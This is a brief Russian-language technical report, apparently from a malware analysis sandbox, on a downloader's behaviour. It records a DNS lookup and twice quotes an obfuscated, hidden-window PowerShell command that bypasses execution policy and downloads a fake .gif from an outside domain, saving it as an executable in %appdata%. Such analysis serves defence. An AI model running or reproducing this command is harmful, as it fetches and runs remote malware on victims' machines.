Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowershelL.exe -exECutioNpOLiCy ByPass -NOPROfIlE -WINdoWSTYlE hIDden (NeW-object sYSteM.net.WeBcLiEnT).DowNloaDfIle('http://www.basopoew.top/read.php?f=1.gif','%aPpdATA%.Exe');S...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /C "PowershelL.exe -exECutioNpOLiCy ByPass -NOPROfIlE -WINdoWSTYlE hIDden (NeW-object sYSteM.net.WeBcLiEnT).DowNloaDfIle('http://www.basopoew.top/read.php?f=1.gif','%aPpdATA%.Exe');S...' (со скрытым окном)